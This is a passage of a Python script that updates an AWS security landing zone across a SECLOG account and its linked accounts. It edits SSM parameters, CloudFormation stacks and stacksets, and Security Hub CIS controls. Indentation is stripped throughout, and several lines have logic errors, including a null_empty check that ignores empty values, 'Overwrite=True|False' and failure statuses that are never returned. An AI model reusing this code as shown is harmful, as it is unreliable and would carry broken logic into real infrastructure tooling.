seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_guardduty-groupname', reg)
cfnssm = boto3.client('ssm')
if do_update(ssm_actions, 'securityhub-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_securityhub-groupname', ssm_actions['securityhub-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-CloudwatchLogs-SecurityHub')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['securityhub-groupname'] and ssm_actions['securityhub-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_securityhub-groupname')
if do_update(ssm_actions, 'config-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_config-groupname', ssm_actions['config-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['config-groupname'] and ssm_actions['config-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_config-groupname')
if do_update(ssm_actions, 'alarms-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_alarms-groupname', ssm_actions['alarms-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['alarms-groupname'] and ssm_actions['alarms-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_alarms-groupname')
cfn = boto3.client('cloudformation',config=boto3_config)
#KMS template
if do_update(stack_actions, 'SECLZ-Cloudtrail-KMS') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Cloudtrail-KMS', stacks, get_params(stack_actions,'SECLZ-Central-Buckets'))
if result != Execution.NO_ACTION:
seclog_status = result
elif result == Execution.OK :
print("SSM parameter /org/member/KMSCloudtrailKey_arn update", end="")
#response = update_ssm_parameter(cfnssm,'/org/member/KMSCloudtrailKey_arn', response['Parameter']['Value'])
add_tags_parameter(cfnssm, '/org/member/KMSCloudtrailKey_arn')
print(f" [{Status.OK.value}]")
#logshipper lambdas S3 bucket
if do_update(stack_actions, 'SECLZ-LogShipper-Lambdas-Bucket') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-LogShipper-Lambdas-Bucket', stacks, get_params(stack_actions,'SECLZ-LogShipper-Lambdas-Bucket'))
if result != Execution.NO_ACTION:
seclog_status = result
#logshipper lambdas
if do_update(stack_actions, 'SECLZ-LogShipper-Lambdas') and seclog_status != Execution.FAIL:
#packaging lambdas
now = datetime.now().strftime('%d%m%Y')
cloudtrail_lambda=f'CloudtrailLogShipper-{now}.zip'
with ZipFile(cloudtrail_lambda,'w') as zip:
zip.write('LAMBDAS/CloudtrailLogShipper.py','CloudtrailLogShipper.py')
config_lambda=f'ConfigLogShipper-{now}.zip'
with ZipFile(config_lambda,'w') as zip:
zip.write('LAMBDAS/ConfigLogShipper.py','ConfigLogShipper.py')
#update CFT file
if seclog_status != Execution.FAIL:
template = stacks['SECLZ-LogShipper-Lambdas']['Template']
print("Template SECLZ-LogShipper-Lambdas update ", end="")
try:
template = stacks['SECLZ-LogShipper-Lambdas']['Template']
with open(template, "r") as f:
template_body=f.read()
template_body = template_body.replace('##cloudtrailCodeURI##',cloudtrail_lambda).replace('##configCodeURI##',config_lambda)
template = f'EC-lz-logshipper-lambdas-{now}.yml'
with open(template, "w") as f:
f.write(template_body)
print(f" [{Status.OK.value}]")
except FileNotFoundError as err:
print(f" [{Status.FAIL.value}]")
seclog_status = Execution.FAIL
#package stack
print("Template SECLZ-LogShipper-Lambdas package ", end="")
bucket=f'lambda-artefacts-{account_id}'
if seclog_status != Execution.FAIL:
prf=''
if has_profile:
prf = f'--profile {profile}'
with Spinner():
cmd = f"aws cloudformation package --template-file {template} {prf} --s3-bucket {bucket} --output-template-file EC-lz-logshipper-lambdas-{now}.packaged.yml"
cmdarg = shlex.split(cmd)
proc = subprocess.Popen(cmdarg,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output, errors = proc.communicate()
if len(errors) > 0:
print(f" failed. Readon {errors} [{Status.FAIL.value}]")
seclog_status = Execution.FAIL
else:
print(f" [{Status.OK.value}]")
os.remove(template)
os.remove(cloudtrail_lambda)
os.remove(config_lambda)
#updating stack
if seclog_status != Execution.FAIL:
stacks['SECLZ-LogShipper-Lambdas']['Template'] = f'EC-lz-logshipper-lambdas-{now}.packaged.yml'
result = update_stack(cfn, 'SECLZ-LogShipper-Lambdas', stacks, get_params(stack_actions,'SECLZ-LogShipper-Lambdas'))
if result != Execution.NO_ACTION:
seclog_status = result
os.remove(f'EC-lz-logshipper-lambdas-{now}.packaged.yml')
#central buckets
if do_update(stack_actions, 'SECLZ-Central-Buckets') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Central-Buckets', stacks, get_params(stack_actions,'SECLZ-Central-Buckets'))
if result != Execution.NO_ACTION:
seclog_status = result
#password policy
if do_update(stack_actions, 'SECLZ-Iam-Password-Policy') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Iam-Password-Policy', stacks, get_params(stack_actions,'SECLZ-Iam-Password-Policy'))
if result != Execution.NO_ACTION:
seclog_status = result
#cloudtrail SNS
if do_update(stack_actions, 'SECLZ-config-cloudtrail-SNS') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-config-cloudtrail-SNS', stacks, get_params(stack_actions,'SECLZ-config-cloudtrail-SNS'))
if result != Execution.NO_ACTION:
seclog_status = result
#guardduty detector
if do_update(stack_actions, 'SECLZ-Guardduty-detector') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Guardduty-detector', stacks, get_params(stack_actions,'SECLZ-Guardduty-detector'))
if result != Execution.NO_ACTION:
seclog_status = result
#securityhub
if do_update(stack_actions, 'SECLZ-SecurityHub') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-SecurityHub', stacks, get_params(stack_actions,'SECLZ-SecurityHub'))
if result != Execution.NO_ACTION:
seclog_status = result
#cloudtrail notifications
if do_update(stack_actions, 'SECLZ-Notifications-Cloudtrail') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Notifications-Cloudtrail', stacks, get_params(stack_actions,'SECLZ-Notifications-Cloudtrail'))
if result != Execution.NO_ACTION:
seclog_status = result
#cloudwatch logs
if do_update(stack_actions, 'SECLZ-CloudwatchLogs-SecurityHub') and seclog_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-CloudwatchLogs-SecurityHub', stacks, get_params(stack_actions,'SECLZ-CloudwatchLogs-SecurityHub'))
if result != Execution.NO_ACTION:
seclog_status = result
#stackset Enable-Config-SecurityHub
if do_update(stacksets_actions, 'SECLZ-Enable-Config-SecurityHub-Globally') and seclog_status != Execution.FAIL:
result = update_stackset(cfn, 'SECLZ-Enable-Config-SecurityHub-Globally', stacksets, get_params(stacksets_actions,'SECLZ-Enable-Config-SecurityHub-Globally'))
if result != Execution.NO_ACTION:
seclog_status = result
#stackset Enable-Guardduty-Globally
if do_update(stacksets_actions, 'SECLZ-Enable-Guardduty-Globally') and seclog_status != Execution.FAIL:
result = update_stackset(cfn, 'SECLZ-Enable-Guardduty-Globally', stacksets, get_params(stacksets_actions,'SECLZ-Enable-Guardduty-Globally'))
if result != Execution.NO_ACTION:
seclog_status = result
#securityhub actions
if securityhub_actions and seclog_status != Execution.FAIL:
cfn = boto3.client('securityhub')
print("Enable SecurityHub Multi-region findings", end="")
toggle_securityhub_multiregion_findings(cfn, securityhub_actions['multiregion-findings']['enable'])
#update LZ version
if version and seclog_status != Execution.FAIL:
cfn = boto3.client('ssm')
result=update_ssm_parameter(cfn, '/org/member/SLZVersion', version)
#add tags
result = add_tags_parameter(cfn, '/org/member/SLZVersion')
if result != Execution.NO_ACTION:
seclog_status = result
print("")
print(f"SECLOG account {account_id} update ", end="")
if seclog_status == Execution.FAIL:
print(f"[{Status.FAIL.value}]")
elif seclog_status == Execution.OK:
print(f"[{Status.OK.value}]")
else:
print(f"[{Status.NO_ACTION.value}]")
#update linked account stacks
if seclog_status == Execution.FAIL and len(linked_accounts) > 0:
print("Skipping linked accounts update")
linked_status = Execution.NO_ACTION
else:
if len(accounts['include']) > 0:
linked_accounts = [d for d in accounts['include'] if d != account_id]
for linked in linked_accounts:
if len(accounts['exclude']) > 0 and linked in accounts['exclude']:
print(f"Skipping linked account {linked}")
else:
sts = boto3.client('sts')
assumedRole = sts.assume_role(
RoleArn=f"arn:aws:iam::{linked}:role/AWSCloudFormationStackSetExecutionRole",
RoleSessionName='CloudFormationSession'
)
credentials = assumedRole['Credentials']
accessKey = credentials['AccessKeyId']
secretAccessKey = credentials['SecretAccessKey']
sessionToken = credentials['SessionToken']
print("")
print(f"Updating linked account {linked}")
print("")
linked_status = Execution.NO_ACTION
if ssm_actions:
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
#update SSM parameters
if do_update(ssm_actions, 'seclog-ou') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLogOU', ssm_actions['seclog-ou']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['seclog-ou'] and ssm_actions['seclog-ou']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLogOU')
if do_update(ssm_actions, 'notification-mail') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_notification-mail', ssm_actions['notification-mail']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['notification-mail'] and ssm_actions['notification-mail']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_notification-mail')
if do_update(ssm_actions, 'cloudtrail-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_cloudtrail-groupname', ssm_actions['cloudtrail-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
will_update(stack_actions,'SECLZ-Notifications-Cloudtrail')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['cloudtrail-groupname'] and ssm_actions['cloudtrail-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_cloudtrail-groupname')
if do_update(ssm_actions, 'insight-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_insight-groupname', ssm_actions['insight-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['insight-groupname'] and ssm_actions['insight-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_insight-groupname')
if do_update(ssm_actions, 'guardduty-groupname') and linked_status != Execution.FAIL:
for region in all_regions:
cfn = boto3.client('ssm', aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region)
result=update_ssm_parameter(cfn, '/org/member/SecLog_guardduty-groupname', ssm_actions['guardduty-groupname']['value'], region)
if result != Execution.OK:
will_update(stack_actions,'SECLZ-Guardduty-detector')
if result != Execution.NO_ACTION:
linked_status = result
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
#add tags
if 'tags' in ssm_actions['guardduty-groupname'] and ssm_actions['guardduty-groupname']['tags'] == True:
for region in all_regions:
cfn = boto3.client('ssm', aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region)
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_guardduty-groupname', region)
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
if do_update(ssm_actions, 'securityhub-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_securityhub-groupname', ssm_actions['securityhub-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-CloudwatchLogs-SecurityHub')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['securityhub-groupname'] and ssm_actions['securityhub-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_securityhub-groupname')
if do_update(ssm_actions, 'config-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_config-groupname', ssm_actions['config-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['config-groupname'] and ssm_actions['config-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_config-groupname')
if do_update(ssm_actions, 'alarms-groupname') and linked_status != Execution.FAIL:
result=update_ssm_parameter(cfn, '/org/member/SecLog_alarms-groupname', ssm_actions['alarms-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
linked_status = result
#add tags
if 'tags' in ssm_actions['alarms-groupname'] and ssm_actions['alarms-groupname']['tags'] == True:
linked_status = add_tags_parameter(cfn, '/org/member/SecLog_alarms-groupname')
cfn = boto3.client('cloudformation',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
#password policy
if do_update(stack_actions, 'SECLZ-Iam-Password-Policy') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Iam-Password-Policy', stacks, get_params(stack_actions,'SECLZ-Iam-Password-Policy'))
if result != Execution.NO_ACTION:
linked_status = result
#cloudtrail SNS
if do_update(stack_actions, 'SECLZ-config-cloudtrail-SNS') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-config-cloudtrail-SNS', stacks, get_params(stack_actions,'SECLZ-config-cloudtrail-SNS'))
if result != Execution.NO_ACTION:
linked_status = result
#securityhub
if do_update(stack_actions, 'SECLZ-SecurityHub') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-SecurityHub', stacks, get_params(stack_actions,'SECLZ-SecurityHub'))
if result != Execution.NO_ACTION:
linked_status = result
#cloudtrail notification
if do_update(stack_actions, 'SECLZ-Notifications-Cloudtrail') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-Notifications-Cloudtrail', stacks, get_params(stack_actions,'SECLZ-Notifications-Cloudtrail'))
if result != Execution.NO_ACTION:
linked_status = result
#local SNS topic
if do_update(stack_actions, 'SECLZ-local-SNS-topic') and linked_status != Execution.FAIL:
result = update_stack(cfn, 'SECLZ-local-SNS-topic', stacks, get_params(stack_actions,'SECLZ-local-SNS-topic'))
if result != Execution.NO_ACTION:
linked_status = result
#update LZ version
if version and linked_status != Execution.FAIL:
cfn = boto3.client('ssm',
aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken)
result=update_ssm_parameter(cfn, '/org/member/SLZVersion', version)
result=add_tags_parameter(cfn, '/org/member/SLZVersion')
if result != Execution.NO_ACTION:
linked_status = result
print("")
print(f"Linked account {linked} update ", end="")
if linked_status == Execution.FAIL:
print(f"[{Status.FAIL.value}]")
elif linked_status == Execution.OK:
print(f"[{Status.OK.value}]")
else:
print(f"[{Status.NO_ACTION.value}]")
print("")
if seclog_status != Execution.FAIL and linked_status != Execution.FAIL:
print("")
print(f"Adding stacks to Stacksets from SECLOG {account_id} ")
print("")
cfn = boto3.client('cloudformation',config=boto3_config)
#stackset add stack SECLZ-Enable-Config-SecurityHub-Globally
if do_add_stack(stacksets_actions, 'SECLZ-Enable-Config-SecurityHub-Globally'):
stacksetacc = linked_accounts.copy()
stacksetacc.append(get_account_id())
result = add_stack_to_stackset(cfn, 'SECLZ-Enable-Config-SecurityHub-Globally', stacksetacc, stacksets_actions['SECLZ-Enable-Config-SecurityHub-Globally']['deploy'])
if result != Execution.NO_ACTION:
seclog_status = result
#stackset add stack SECLZ-Enable-Guardduty-Globally
if do_add_stack(stacksets_actions, 'SECLZ-Enable-Guardduty-Globally') and seclog_status != Execution.FAIL:
stacksetacc = linked_accounts.copy()
stacksetacc.append(get_account_id())
result = add_stack_to_stackset(cfn, 'SECLZ-Enable-Guardduty-Globally', stacksetacc, stacksets_actions['SECLZ-Enable-Guardduty-Globally']['deploy'])
if result != Execution.NO_ACTION:
seclog_status = result
print("")
print(f"Adding stacks to Stacksets from SECLOG {account_id} ", end="")
if seclog_status == Execution.FAIL:
print(f"[{Status.FAIL.value}]")
elif seclog_status == Execution.OK:
print(f"[{Status.OK.value}]")
else:
print(f"[{Status.NO_ACTION.value}]")
print("")
else:
print("")
print(f"Skipping adding stacks to Stacksets from SECLOG {account_id} ")
print("")
#cis controls SECLOG
if not null_empty(manifest, 'cis') and seclog_status != Execution.FAIL:
seclog_status = update_cis_controls(rules=cis_actions,accountid=account_id)
#cis controls linked accounts
if seclog_status == Execution.FAIL and len(linked_accounts) > 0 and null_empty(manifest, 'cis'):
print("Skipping linked accounts CIS controls update")
linked_status = Execution.NO_ACTION
else:
if len(accounts['include']) > 0:
linked_accounts = [d for d in accounts['include'] if d != account_id]
for linked in linked_accounts:
if len(accounts['exclude']) > 0 and linked in accounts['exclude']:
print(f"Skipping linked account {linked}")
else:
sts = boto3.client('sts')
assumedRole = sts.assume_role(
RoleArn=f"arn:aws:iam::{linked}:role/AWSCloudFormationStackSetExecutionRole",
RoleSessionName='CloudFormationSession'
)
credentials = assumedRole['Credentials']
accessKey = credentials['AccessKeyId']
secretAccessKey = credentials['SecretAccessKey']
sessionToken = credentials['SessionToken']
if not null_empty(manifest, 'cis') and linked_status != Execution.FAIL:
linked_status = update_cis_controls(
rules=cis_actions,
accountid=linked,
accessKey=accessKey,
secretAccessKey=secretAccessKey,
sessionToken=sessionToken
)
print("")
print(f"####### AWS Landing Zone update script finished. Executed in {time.time() - start_time} seconds")
print("#######")
print("")
def usage():
"""
This function prints the script usage
"""
print('Usage:')
print('')
print('python EC-Update-LZ.py -m <manifest> [-s <seclogprofile>] [-o <orgprofile>] [-v]')
print('')
print(' Provide ')
print(' -m --manifext : The manifest for the LZ update')
print(' -s --seclog : The AWS profile of the SECLOG account - optional')
print(' -o --org : The AWS ID of the Organisation account - optional')
print(' -v --verbose : Debug mode - optional')
def get_account_id(Force = False):
"""
This function gets te id of the account defined in the profile
:param force: flag to force the retrieval of the account ID
:return: a string with the account id
"""
global account_id
if account_id == '' or Force == True:
sts = boto3.client('sts')
try:
response = sts.get_caller_identity()
account_id = response['Account']
except ClientError as error:
if error.response['Error']['Code'] == 'AccessDenied':
print(f"Access denied getting account id [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
else:
raise error
return account_id
def get_linked_accounts():
"""
Function to retrieve the Linked accounts from a SECLOG account
:return: list with linked account details
"""
linked_accounts = []
accountId = get_account_id()
client = boto3.client('guardduty')
response = client.list_detectors()
if response['DetectorIds'][0] != '':
data = client.list_members(DetectorId=response['DetectorIds'][0])
for member in data['Members']:
if member['RelationshipStatus'] == 'Enabled':
linked_accounts.append(member['AccountId'])
return linked_accounts
def is_seclog():
"""
Function that checks if the account is a seclog account
:return: true or false
"""
client = boto3.client('ssm')
seclog_account_id = get_account_id()
response = client.get_parameter(Name='/org/member/SecLogMasterAccountId')
if not 'Value' not in response or seclog_account_id != response['Parameter']['Value']:
return False
return True
def null_empty(dict, key):
"""
Function that checks if the a key exists in the dict and the value is not empty
:return: true or false
"""
if key in dict:
return False
return True
def do_update(dict, key):
"""
Function that checks if the a key exists in the dict and the value is not empty
:return: true or false
"""
if not null_empty(dict, key) and 'update' in dict[key] and dict[key]['update'] == True:
return True
else: return False
def do_add_stack(dict, key):
"""
Function that checks if the a key exists in the dict and the value is not empty
:return: true or false
"""
if not null_empty(dict, key) and 'deploy' in dict[key] and dict[key]['deploy']:
return True
else: return False
def will_update(dict, key):
"""
Function that sets a stack to be updated
"""
if not null_empty(dict, key) and 'update' in dict[key] and dict[key]['update'] == False:
dict[key]['update'] = True
def merge_tags(list1, list2):
"""
Function to merge two list of tags
"""
res = {}
output = []
for item in list1:
res[item['Key']] = item['Value']
for item in list2:
res[item['Key']] = item['Value']
for item in res:
output.append({"Key": item, "Value": res[item]})
return output
def merge_params(list1, list2):
"""
Function to merge two list of params
"""
res = {}
output = []
for item in list1:
res[item['ParameterKey']] = item['ParameterValue']
for item in list2:
res[item['ParameterKey']] = item['ParameterValue']
for item in res:
output.append({"ParameterKey": item, "ParameterValue": res[item]})
return output
def get_params(actions, key):
return actions[key]['params'] if key in actions and 'params' in actions[key] else []
def add_tags_parameter(client,parameter,region=None):
global tags
if region:
print(f"Adding tags to SSM parameter {parameter} [{region}] ", end="")
else:
print(f"Adding tags to SSM parameter {parameter} ", end="")
try:
response = client.get_parameter(Name=parameter)
except Exception as err:
print(f"failed, reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
try:
response=client.add_tags_to_resource(
ResourceType='Parameter',
ResourceId=parameter,
Tags=tags)
print(f"[{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed, reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def update_ssm_parameter(client, parameter, value, region=None):
"""
Function used to update an SSM parameter if the value is different
:paremter: parameter name
:value: the value to be updated
:return: execution status
"""
exists = True
if region:
print(f"SSM parameter {parameter} update [{region}] ", end="")
else:
print(f"SSM parameter {parameter} update ", end="")
try:
response = client.get_parameter(Name=parameter)
except Exception as err:
exists=False
try:
if not exists or ('Value' in response['Parameter'] and value != response['Parameter']['Value']):
response = client.put_parameter(
Name=parameter,
Value=value,
Type='String',
Overwrite=True|False)
if response['Version']:
print(f"[{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
print(f"[{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
def get_controls(client, region, sub_arn, NextToken=None):
controls = client.describe_standards_controls(
NextToken=NextToken,
StandardsSubscriptionArn=sub_arn) if NextToken else client.describe_standards_controls(
StandardsSubscriptionArn=sub_arn)
if ('NextToken' in controls):
return controls['Controls'] + get_controls(client, region, sub_arn, NextToken=controls['NextToken'])
else:
return controls['Controls']
def toggle_securityhub_multiregion_findings(client, enable=True):
response0 = client.list_finding_aggregators()
if len(response0['FindingAggregators']) == 0 and enable:
try:
response = client.create_finding_aggregator(
RegionLinkingMode='ALL_REGIONS'
)
print(f" [{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
elif len(response0['FindingAggregators']) == 1 and enable == False:
try:
response = client.delete_finding_aggregator(
FindingAggregatorArn=response0['FindingAggregators'][0]['FindingAggregatorArn']
)
print(f" [{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
else:
print(f" [{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
def update_cis_controls(rules, accountid,
accessKey=None,
secretAccessKey=None,
sessionToken=None):
global all_regions
print(f"CIS controls update [{accountid}]", end="")
try:
with Spinner():
#enable all rules
failed_regions = []
for region in all_regions:
try:
client = boto3.client('securityhub',aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region
)
client.batch_enable_standards(
StandardsSubscriptionRequests=[
{
'StandardsArn': "arn:aws:securityhub:::ruleset/cis-aws-foundations-benchmark/v/1.2.0",
},
]
)
client.batch_enable_standards(
StandardsSubscriptionRequests=[
{
'StandardsArn': f"arn:aws:securityhub:{region}::standards/aws-foundational-security-best-practices/v/1.0.0",
},
]
)
except Exception as err:
failed_regions.append(region)
if len(failed_regions) > 0:
print(f"failed. Reason Account is not subscribed to AWS Security Hub on the following regions {failed_regions} [{Status.FAIL.value}]")
return Execution.FAIL
enabled_rules = { key:value for (key,value) in rules.items() if value['disabled'] == False}
disabled_rules = { key:value for (key,value) in rules.items() if value['disabled'] == True}
#enabled rules
for rule,value in enabled_rules.items():
regions = value['regions'] if 'regions' in value and len(value['regions']) > 0 else all_regions
if 'exclusions' in value:
regions = [d for d in regions if d not in value['exclusions']]
for region in regions:
client = boto3.client('securityhub',aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region
)
stds = client.get_enabled_standards()
for std in stds['StandardsSubscriptions']:
controls = []
available_controls = get_controls(client, region, std['StandardsSubscriptionArn'])
if 'checks' not in value:
controls = [d for d in available_controls if rule in d['StandardsControlArn'] ]
else:
for check in value['checks']:
controls.extend([d for d in available_controls if f"{rule}/{check}" in d['StandardsControlArn'] ])
for control in controls:
try:
client.update_standards_control(
StandardsControlArn=control['StandardsControlArn'],
ControlStatus='ENABLED'
)
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
#disabled rules
for rule,value in disabled_rules.items():
regions = value['regions'] if 'regions' in value and len(value['regions']) > 0 else all_regions
if 'exclusions' in value:
regions = [d for d in regions if d not in value['exclusions']]
for region in regions:
client = boto3.client('securityhub',aws_access_key_id=accessKey,
aws_secret_access_key=secretAccessKey,
aws_session_token=sessionToken,
region_name=region
)
stds = client.get_enabled_standards()
for std in stds['StandardsSubscriptions']:
available_controls = get_controls(client, region, std['StandardsSubscriptionArn'])
controls = []
if 'checks' not in value:
controls = [d for d in available_controls if rule in d['StandardsControlArn'] ]
else:
for check in value['checks']:
controls.extend([d for d in available_controls if f"{rule}/{check}" in d['StandardsControlArn'] ])
for control in controls:
try:
response=client.update_standards_control(
StandardsControlArn=control['StandardsControlArn'],
ControlStatus='DISABLED',
DisabledReason='Managed by Cloud Broker Team' if 'disabled-reason' not in value else value['disabled-reason'],
)
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
print(f" [{Status.OK.value}]")
return Execution.OK
except Exception as err:
print(f"failed. Reason {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def validate_params(params, template):
new_params = []
dict_template = load_yaml(template)
return [elem for elem in params if elem['ParameterKey'] in dict_template['Parameters']]
def update_stack(client, stack, templates, params=[]):
"""
Function that updates a stack defined in the parameters
:stack: The stack name
:template_data: dict holding CFT details
:params: parameters to be passed to the stack
:return: True or False
"""
global tags
template = templates[stack]['Template']
capabilities=[]
print(f"Stack {stack} update ", end="")
try:
with open(template, "r") as f:
template_body=f.read()
response = client.describe_stacks(StackName=stack)
except FileNotFoundError as err:
print(f"\033[2K\033[Stack template file not found : {err.strerror} [{Status.FAIL.value}]")
return Execution.FAIL
except ClientError as err:
print(f"\033[2K\033[1GStack {stack} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
if 'Parameters:' in template_body:
if not null_empty(templates[stack], 'Params'):
try:
with open(templates[stack]['Params']) as f:
params = json.load(f)
except FileNotFoundError as err:
print(f"\033[2K\033[1GParameter file not found : {err.strerror} [{Status.FAIL.value}]")
Execution.FAIL
except json.decoder.JSONDecodeError as err:
print(f"\033[2K\033[1GParameter file problem : {err.strerror} [{Status.FAIL.value}]")
Execution.FAIL
elif not null_empty(response['Stacks'][0], 'Parameters'):
params = merge_params(response['Stacks'][0]['Parameters'], params)
if not null_empty(response['Stacks'][0], 'Capabilities'):
capabilities = response['Stacks'][0]['Capabilities']
if not null_empty(response['Stacks'][0], 'Tags'):
apply_tags = merge_tags(response['Stacks'][0]['Tags'], tags)
if response['Stacks'][0]['StackStatus'] not in ('CREATE_COMPLETE', 'UPDATE_COMPLETE','UPDATE_ROLLBACK_COMPLETE'):
print(f"Cannot update stack {stack}. Current status is : {response['Stacks'][0]['StackStatus']} [{Status.FAIL.value}]")
return Execution.FAIL
print("in progress ", end="")
with Spinner():
try:
client.update_stack(
StackName=stack,
TemplateBody=template_body,
Parameters=validate_params(params, template_body),
Capabilities=capabilities,
Tags=apply_tags)
updated=False
while updated == False:
try:
time.sleep(1)
response = client.describe_stacks(StackName=stack)
if 'COMPLETE' in response['Stacks'][0]['StackStatus'] :
print(f"\033[2K\033[1GStack {stack} update [{Status.OK.value}]")
updated=True
break
elif 'FAILED' in response['Stacks'][0]['StackStatus'] or 'ROLLBACK' in response['Stacks'][0]['StackStatus'] :
print(f"\033[2K\033[1GStack {stack} update failed. Reason {response['Stacks'][0]['StackStatusReason']} [{Status.FAIL.value}]")
return Execution.FAIL
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
else:
raise err
return Execution.OK
except ClientError as err:
if err.response['Error']['Code'] == 'AmazonCloudFormationException':
print(f"\033[2K\033[1GStack {stack} not found : {err.response['Error']['Message']} [{Status.FAIL.value}]")
elif err.response['Error']['Code'] == 'ValidationError' and err.response['Error']['Message'] == 'No updates are to be performed.':
print(f"\033[2K\033[1GStack {stack} update [{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
else:
